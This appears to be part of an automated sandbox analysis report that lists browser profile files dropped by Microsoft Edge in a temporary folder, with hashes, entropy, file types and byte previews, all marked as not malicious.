                                                                                                                                                                                                                                                                                                              SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                                                                                                                                                                              SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                                                                                                                                                                              SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:...m.................DB_VERSION.1

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\EdgeCoupons\coupons_data.db\CURRENT (copy)

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\EdgeCoupons\coupons_data.db\LOG

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):289
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.275105895836357
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:6:kajR1923fQyS//G2tbB2KLlmaqc+q2P923fQyS//G2tMsIFUv:D8s9VFLF+v4s9GFUv
                                                                                                                                                                                                                                                                                                              MD5:DDBEF800BD9D4359FF6F84EB75D307EC
                                                                                                                                                                                                                                                                                                              SHA1:D2950F0F6949880977346E4A558EFF3FF48BF608
                                                                                                                                                                                                                                                                                                              SHA-256:0C3894B6DC4226D4F9B70227CAD2F71D06B92E4347EF93749EB7125D59E8B3C6
                                                                                                                                                                                                                                                                                                              SHA-512:8AAFBB5ABF87AC6EF7BA8BB809BF2ECF560B21D05777E759E21912AB2EECCACE2E5F26BD02024EDA941DBB8E09F93EC44C5BBE3CF9741B6C95DE4849B46BFF8A
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:2024/12/22-17:54:52.809 4dc Creating DB C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\EdgeCoupons/coupons_data.db since it was missing..2024/12/22-17:54:52.959 4dc Reusing MANIFEST C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\EdgeCoupons\coupons_data.db\MANIFEST-000001

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):41
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                              MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                              SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                              SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                              SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Extension Rules\000001.dbtmp

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Extension Rules\000003.log

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):171
                                                                                                                                                                                                                                                                                                              Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:FQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlX:qTCTCTCTCTCTCTCTCT
                                                                                                                                                                                                                                                                                                              MD5:E952942B492DB39A75DD2669B98EBE74
                                                                                                                                                                                                                                                                                                              SHA1:F6C4DEF325DCA0DFEC01759D7D8610837A370176
                                                                                                                                                                                                                                                                                                              SHA-256:14F92B911F9FE774720461EEC5BB4761AE6BFC9445C67E30BF624A8694B4B1DA
                                                                                                                                                                                                                                                                                                              SHA-512:9193E7BBE7EB633367B39513B48EFED11FD457DCED070A8708F8572D0AB248CBFF37254599A6BFB469637E0DCCBCD986347C6B6075C06FAE2AF08387B560DEA0
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Extension Rules\CURRENT (copy)

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Extension Rules\LOG

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):265
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.245236430969773
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:6:kaPv+q1923fQyS/UaVdg2KLlmahIq2P923fQyS/UaPrqIFUv:OfzLqv4s3FUv
                                                                                                                                                                                                                                                                                                              MD5:1CF53904790DF8F47501A6BF9BF6B098
                                                                                                                                                                                                                                                                                                              SHA1:9BEA2853D2BB93DD5A6A9EA453CDE3F9A3585993
                                                                                                                                                                                                                                                                                                              SHA-256:8114CE471BD78B72A3EB5E938F0F3194EEDF3D8C88491C45DE63FBD4943E7D47
                                                                                                                                                                                                                                                                                                              SHA-512:2F8D7C1A74C801DF5055BB608037C47BB8667C730C28A78D93EC4BF3FC58889759808D2E9E2ED0563DC12F83C4CDECA855929584AF161ABECFA227DF78D01680
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:2024/12/22-17:54:52.814 cd0 Creating DB C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Extension Rules since it was missing..2024/12/22-17:54:52.834 cd0 Reusing MANIFEST C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Extension Rules/MANIFEST-000001.

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Extension Rules\MANIFEST-000001

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):41
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                              MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                              SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                              SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                              SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Extension Scripts\000001.dbtmp

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Extension Scripts\000003.log

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):171
                                                                                                                                                                                                                                                                                                              Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:FQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlX:qTCTCTCTCTCTCTCTCT
                                                                                                                                                                                                                                                                                                              MD5:E952942B492DB39A75DD2669B98EBE74
                                                                                                                                                                                                                                                                                                              SHA1:F6C4DEF325DCA0DFEC01759D7D8610837A370176
                                                                                                                                                                                                                                                                                                              SHA-256:14F92B911F9FE774720461EEC5BB4761AE6BFC9445C67E30BF624A8694B4B1DA
                                                                                                                                                                                                                                                                                                              SHA-512:9193E7BBE7EB633367B39513B48EFED11FD457DCED070A8708F8572D0AB248CBFF37254599A6BFB469637E0DCCBCD986347C6B6075C06FAE2AF08387B560DEA0
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Extension Scripts\CURRENT (copy)

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Extension Scripts\LOG

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):269
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.239133776021477
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:6:kaMFwq1923fQyS/U6FB2KLlmapOq2P923fQyS/U65IFUv:sFwfsFFLBOv4sWFUv
                                                                                                                                                                                                                                                                                                              MD5:220F56C4DE61B580B49D29DEFE784F57
                                                                                                                                                                                                                                                                                                              SHA1:041C761E1515EE5944802523FCD726FB0D5A9BAB
                                                                                                                                                                                                                                                                                                              SHA-256:0A01BAF66B11E66CE95AC1E39CE7FA5EE681E25205442BC0A70A2B5BACD0DFB8
                                                                                                                                                                                                                                                                                                              SHA-512:ACA3880D3230B70C64E989E339C8B90C5F91B4F15BEA6B5DB65A4D1785A8C68933929D6912FA0ED37C77238871DF3F595C8C54EEF5A16DC8AA2CCB0A55304CE8
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:2024/12/22-17:54:52.943 cd0 Creating DB C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Extension Scripts since it was missing..2024/12/22-17:54:52.959 cd0 Reusing MANIFEST C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Extension Scripts/MANIFEST-000001.

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Extension Scripts\MANIFEST-000001

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):41
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                              MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                              SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                              SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                              SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Favicons

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 10, cookie 0x8, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.6975083372685086
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:24:LLiZxh0GY/l1rWR1PmCx9fZjsBX+T6UwcE85fBmI:EBmw6fU1zBmI
                                                                                                                                                                                                                                                                                                              MD5:F5BBD8449A9C3AB28AC2DE45E9059B01
                                                                                                                                                                                                                                                                                                              SHA1:C569D730853C33234AF2402E69C19E0C057EC165
                                                                                                                                                                                                                                                                                                              SHA-256:825FF36C4431084C76F3D22CE0C75FA321EA680D1F8548706B43E60FCF5B566E
                                                                                                                                                                                                                                                                                                              SHA-512:96ACDED5A51236630A64FAE91B8FA9FAB43E22E0C1BCB80C2DD8D4829E03FBFA75AA6438053599A42EC4BBCF805BF0B1E6DFF9069B2BA182AD0BB30F2542FD3F
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j..........g....._.c...~.2.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................s...;+...indexfavicon_bitmaps_icon_idfavico

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\GPUCache\data_0

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):8192
                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.01057775872642915
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:MsFl:/F
                                                                                                                                                                                                                                                                                                              MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                                                                                                                                                              SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                                                                                                                                                              SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                                                                                                                                                              SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\GPUCache\data_1

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):270336
                                                                                                                                                                                                                                                                                                              Entropy (8bit):8.280239615765425E-4
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                                                                                                                                                                              MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                                                                                                                                                                              SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                                                                                                                                                                              SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                                                                                                                                                                              SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\GPUCache\data_2

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):8192
                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.011852361981932763
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:MsHlDll:/H
                                                                                                                                                                                                                                                                                                              MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                                                                                                                                                              SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                                                                                                                                                              SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                                                                                                                                                              SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\GPUCache\data_3

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):8192
                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.012340643231932763
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                                                                                                                                                              MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                                                                                                                                                              SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                                                                                                                                                              SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                                                                                                                                                              SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\GPUCache\index

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):262512
                                                                                                                                                                                                                                                                                                              Entropy (8bit):9.553120663130604E-4
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:LsNl+4X:Ls35
                                                                                                                                                                                                                                                                                                              MD5:DC3F9CFD69BB88DB9758BB56DB153F84
                                                                                                                                                                                                                                                                                                              SHA1:9618BCC12A783821446774F09145201C3A004DF2
                                                                                                                                                                                                                                                                                                              SHA-256:B7722DD6575F51964265EF805872697774EDE6B32DA57E47ACF8DD0D41A3A24B
                                                                                                                                                                                                                                                                                                              SHA-512:CBD175FA80D63A922AB2FF4A9F54A2A9722CE210388423E2F7B407CF945B436FE6DB496DF2335A47872DA2D21DE30F2F1312B9C975CCA9B199AE08233378172F
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:.........................................A#.z./.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\History

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):155648
                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.5407252242845243
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                                                                                                                                              MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                                                                                                                                              SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                                                                                                                                              SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
